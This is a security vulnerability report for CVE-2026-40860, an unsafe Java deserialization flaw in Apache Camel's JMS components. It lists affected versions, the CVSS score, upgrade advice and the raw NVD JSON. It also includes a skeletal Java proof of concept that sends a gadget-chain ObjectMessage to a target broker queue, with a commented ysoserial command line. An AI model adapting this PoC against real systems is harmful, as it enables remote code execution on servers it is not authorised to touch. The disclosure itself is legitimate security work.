Security Vulnerability Report
CVE-2026-40860 CVSS 9.8 CRITICAL

CVE-2026-40860

Published: 2026-04-27 09:16:02
Last Modified: 2026-04-28 19:42:47

Description

JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class allowlist or class denylist. Because this code path is reached whenever the mapJmsMessage option is enabled (the default) and Camel acts as a JMS consumer, an attacker able to publish a crafted ObjectMessage to a queue or topic consumed by a Camel application could achieve remote code execution when a deserialization gadget chain was present on the classpath. The same handling was reached transitively through camel-sjms2 (whose Sjms2Endpoint extends SjmsEndpoint) and through camel-amqp (whose AMQPJmsBinding extends JmsBinding), and by other JMS-family components built on JmsComponent such as camel-activemq and camel-activemq6. This issue affects Apache Camel: from 3.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:camel:*:*:*:*:*:*:*:* - VULNERABLE (Apache Camel >= 3.0.0, < 4.14.7)
cpe:2.3:a:apache:camel:*:*:*:*:*:*:*:* - VULNERABLE (Apache Camel >= 4.15.0, < 4.18.2)
cpe:2.3:a:apache:camel:4.19.0:*:*:*:*:*:*:* - VULNERABLE (Apache Camel >= 4.19.0, < 4.20.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
java
// Java Conceptual PoC for CVE-2026-40860
// Demonstrates sending a malicious ObjectMessage to trigger deserialization in Apache Camel
import java.io.Serializable;
import javax.jms.*;
import org.apache.activemq.ActiveMQConnectionFactory;

public class CamelDeserializationPoc {
    public static void main(String[] args) {
        try {
            // 1. Establish connection to the JMS Broker
            ConnectionFactory connectionFactory =
                    new ActiveMQConnectionFactory("tcp://target-jms-broker:61616");
            Connection connection = connectionFactory.createConnection();
            Session session = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);

            // 2. Define the target queue or topic consumed by Camel
            Destination destination = session.createQueue("VULNERABLE_QUEUE");
            MessageProducer producer = session.createProducer(destination);

            // 3. Generate a malicious payload object using a gadget chain (e.g., via ysoserial)
            // Object payload = SerializeUtil.generate("CommonsCollections5", "touch /tmp/pwned");
            // ObjectMessage.setObject() takes a Serializable, so the payload is typed accordingly
            Serializable maliciousPayload = getExploitObject();

            // 4. Wrap the payload in an ObjectMessage
            ObjectMessage message = session.createObjectMessage();
            message.setObject(maliciousPayload);

            // 5. Send the message. Camel's JmsBinding will deserialize it automatically.
            producer.send(message);
            System.out.println("[+] Malicious ObjectMessage sent successfully.");

            connection.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    // Helper to simulate payload generation
    private static Serializable getExploitObject() {
        // In a real attack, return a serialized object from a gadget chain
        return "ExploitGadgetObject";
    }
}

References

https://camel.apache.org/security/CVE-2026-40860.html (Vendor Advisory)
http://www.openwall.com/lists/oss-security/2026/04/26/10 (Mailing List, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40860", "sourceIdentifier": "[email protected]", "published": "2026-04-27T09:16:01.770", "lastModified": "2026-04-28T19:42:46.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class allowlist or class denylist. Because this code path is reached whenever the mapJmsMessage option is enabled (the default) and Camel acts as a JMS consumer, an attacker able to publish a crafted ObjectMessage to a queue or topic consumed by a Camel application could achieve remote code execution when a deserialization gadget chain was present on the classpath. The same handling was reached transitively through camel-sjms2 (whose Sjms2Endpoint extends SjmsEndpoint) and through camel-amqp (whose AMQPJmsBinding extends JmsBinding), and by other JMS-family components built on JmsComponent such as camel-activemq and camel-activemq6.\n\nThis issue affects Apache Camel: from 3.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0.\n\nUsers are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:camel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "4.14.7", "matchCriteriaId": "9A9BE1D5-B34C-4683-86D0-AC655FE1B068"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:camel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15.0", "versionEndExcluding": "4.18.2", "matchCriteriaId": "806A2561-97E3-42A3-931D-A9040BB96CE5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:camel:4.19.0:*:*:*:*:*:*:*", "matchCriteriaId": "EDA4D206-8808-4D2A-873E-8488DD7E3E16"}]}]}], "references": [{"url": "https://camel.apache.org/security/CVE-2026-40860.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/26/10", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}